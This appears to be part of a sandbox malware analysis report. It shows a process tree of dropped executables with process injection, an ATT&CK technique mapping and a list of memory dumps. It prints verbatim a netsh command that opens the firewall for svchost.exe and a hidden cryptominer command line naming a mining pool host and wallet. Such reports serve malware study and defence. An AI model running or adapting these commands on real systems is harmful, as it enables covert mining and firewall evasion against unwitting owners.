- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:2032

C:\Users\Admin\AppData\Local\Temp\DB06.exe
C:\Users\Admin\AppData\Local\Temp\DB06.exe
1⤵
- Executes dropped EXE
PID:1652
- C:\Users\Admin\AppData\Local\Temp\xImzabj022kKhKW.exe
  "C:\Users\Admin\AppData\Local\Temp\xImzabj022kKhKW.exe"
  2⤵
  PID:2240
- C:\Users\Admin\AppData\Local\Temp\MunchingHallstand_2021-08-26_19-29.exe
  "C:\Users\Admin\AppData\Local\Temp\MunchingHallstand_2021-08-26_19-29.exe"
  2⤵
  PID:2268

C:\Users\Admin\AppData\Local\Temp\DEBF.exe
C:\Users\Admin\AppData\Local\Temp\DEBF.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  - Executes dropped EXE
  PID:1528
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  - Executes dropped EXE
  PID:788
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2032
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2216
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2344
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2672
- C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  C:\Users\Admin\AppData\Local\Temp\DEBF.exe
  2⤵
  PID:2776

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1084

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1756

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1724

C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe
C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe /d"C:\Users\Admin\AppData\Local\Temp\D7DA.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1544
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1052
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:2524

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1464

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2036

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:384

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1744

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:568

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1092

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2064

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

File Deletion

T1107

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/332-178-0x0000000000000000-mapping.dmp

Download
memory/384-152-0x0000000000070000-0x0000000000076000-memory.dmp

Filesize
24KB

Download
memory/384-153-0x0000000000060000-0x000000000006C000-memory.dmp

Filesize
48KB

Download
memory/384-148-0x0000000000000000-mapping.dmp

Download
memory/568-159-0x0000000000000000-mapping.dmp

Download
memory/568-160-0x0000000000070000-0x0000000000075000-memory.dmp

Filesize
20KB

Download
memory/568-161-0x0000000000060000-0x0000000000069000-memory.dmp

Filesize
36KB

Download
memory/572-82-0x0000000000020000-0x0000000000033000-memory.dmp

Filesize
76KB

Download
memory/572-97-0x0000000000400000-0x00000000023AC000-memory.dmp

Filesize
31.7MB

Download
memory/572-71-0x0000000000000000-mapping.dmp

Download
memory/676-81-0x0000000000710000-0x0000000000711000-memory.dmp

Filesize
4KB

Download
memory/676-74-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/676-68-0x0000000000000000-mapping.dmp

Download
memory/808-109-0x0000000000000000-mapping.dmp

Download
memory/900-182-0x0000000000000000-mapping.dmp

Download
memory/936-183-0x0000000000000000-mapping.dmp

Download
memory/940-188-0x0000000000000000-mapping.dmp

Download
memory/972-177-0x0000000000000000-mapping.dmp

Download
memory/1052-133-0x0000000000080000-0x0000000000095000-memory.dmp

Filesize
84KB

Download
memory/1052-134-0x0000000000089A6B-mapping.dmp

Download
memory/1072-105-0x0000000000000000-mapping.dmp

Download
memory/1084-92-0x0000000000000000-mapping.dmp

Download
memory/1084-94-0x000000006F721000-0x000000006F723000-memory.dmp

Filesize
8KB

Download
memory/1084-98-0x0000000000180000-0x00000000001F4000-memory.dmp

Filesize
464KB

Download
memory/1084-96-0x00000000000D0000-0x000000000013B000-memory.dmp

Filesize
428KB

Download
memory/1092-171-0x0000000000090000-0x0000000000095000-memory.dmp

Filesize
20KB

Download
memory/1092-172-0x0000000000080000-0x0000000000089000-memory.dmp

Filesize
36KB

Download
memory/1092-164-0x0000000000000000-mapping.dmp

Download
memory/1156-176-0x0000000000000000-mapping.dmp

Download
memory/1188-179-0x0000000000000000-mapping.dmp

Download
memory/1256-64-0x0000000002220000-0x0000000002236000-memory.dmp

Filesize
88KB

Download
memory/1464-117-0x00000000000F0000-0x00000000000F9000-memory.dmp

Filesize
36KB

Download
memory/1464-116-0x0000000000000000-mapping.dmp

Download
memory/1464-118-0x00000000000E0000-0x00000000000EF000-memory.dmp

Filesize
60KB

Download
memory/1464-91-0x0000000000000000-mapping.dmp

Download
memory/1496-61-0x0000000000402FAB-mapping.dmp

Download
memory/1496-62-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/1496-60-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1544-136-0x0000000000400000-0x00000000023AC000-memory.dmp

Filesize
31.7MB

Download
memory/1592-180-0x0000000000000000-mapping.dmp

Download
memory/1652-79-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/1652-76-0x0000000000000000-mapping.dmp

Download
memory/1724-108-0x000000006F481000-0x000000006F483000-memory.dmp

Filesize
8KB

Download
memory/1724-110-0x0000000000090000-0x0000000000097000-memory.dmp

Filesize
28KB

Download
memory/1724-106-0x0000000000000000-mapping.dmp

Download
memory/1724-111-0x0000000000080000-0x000000000008B000-memory.dmp

Filesize
44KB

Download
memory/1744-157-0x0000000000090000-0x0000000000094000-memory.dmp

Filesize
16KB

Download
memory/1744-154-0x0000000000000000-mapping.dmp

Download
memory/1744-158-0x0000000000080000-0x0000000000089000-memory.dmp

Filesize
36KB

Download
memory/1756-102-0x0000000000000000-mapping.dmp

Download
memory/1756-103-0x0000000000070000-0x0000000000077000-memory.dmp

Filesize
28KB

Download
memory/1756-104-0x0000000000060000-0x000000000006C000-memory.dmp

Filesize
48KB

Download
memory/1804-175-0x0000000000000000-mapping.dmp

Download
memory/1928-87-0x00000000000A0000-0x00000000000A1000-memory.dmp

Filesize
4KB

Download
memory/1928-84-0x0000000000000000-mapping.dmp

Download
memory/1928-95-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/1932-65-0x0000000000000000-mapping.dmp

Download
memory/1948-122-0x0000000000000000-mapping.dmp

Download
memory/1984-186-0x0000000000000000-mapping.dmp

Download
memory/2004-63-0x0000000000230000-0x000000000023A000-memory.dmp

Filesize
40KB

Download
memory/2008-162-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2008-163-0x000000000041A6AE-mapping.dmp

Download
memory/2008-167-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2012-101-0x0000000000000000-mapping.dmp

Download
memory/2032-114-0x0000000000000000-mapping.dmp

Download
memory/2036-138-0x0000000000080000-0x0000000000089000-memory.dmp

Filesize
36KB

Download
memory/2036-137-0x0000000000090000-0x0000000000095000-memory.dmp

Filesize
20KB

Download
memory/2036-128-0x0000000000000000-mapping.dmp

Download
memory/2040-99-0x0000000000000000-mapping.dmp

Download
memory/2040-125-0x0000000000000000-mapping.dmp

Download
memory/2040-151-0x00000000000E0000-0x00000000000E1000-memory.dmp

Filesize
4KB

Download
memory/2184-189-0x0000000000000000-mapping.dmp

Download
memory/2216-200-0x000000000041A6AE-mapping.dmp

Download
memory/2216-222-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/2240-192-0x0000000000000000-mapping.dmp

Download
memory/2240-196-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/2240-204-0x0000000004870000-0x0000000004871000-memory.dmp

Filesize
4KB

Download
memory/2268-207-0x0000000003100000-0x000000000311D000-memory.dmp

Filesize
116KB

Download
memory/2268-209-0x0000000004890000-0x00000000048AC000-memory.dmp

Filesize
112KB

Download
memory/2268-206-0x00000000003D0000-0x0000000000400000-memory.dmp

Filesize
192KB

Download
memory/2268-208-0x0000000004A11000-0x0000000004A12000-memory.dmp

Filesize
4KB

Download
memory/2268-212-0x0000000004A13000-0x0000000004A14000-memory.dmp

Filesize
4KB

Download
memory/2268-205-0x0000000000400000-0x0000000002CD5000-memory.dmp

Filesize
40.8MB

Download
memory/2268-211-0x0000000004A14000-0x0000000004A16000-memory.dmp

Filesize
8KB

Download
memory/2268-210-0x0000000004A12000-0x0000000004A13000-memory.dmp

Filesize
4KB

Download
memory/2268-195-0x0000000000000000-mapping.dmp

Download
memory/2524-213-0x00000000000F0000-0x00000000001E1000-memory.dmp

Filesize
964KB

Download
memory/2524-217-0x000000000018259C-mapping.dmp

Download
memory/2632-224-0x000000000041A6AE-mapping.dmp

Download
memory/2632-229-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/2672-231-0x000000000041A6AE-mapping.dmp

Download
memory/2672-236-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download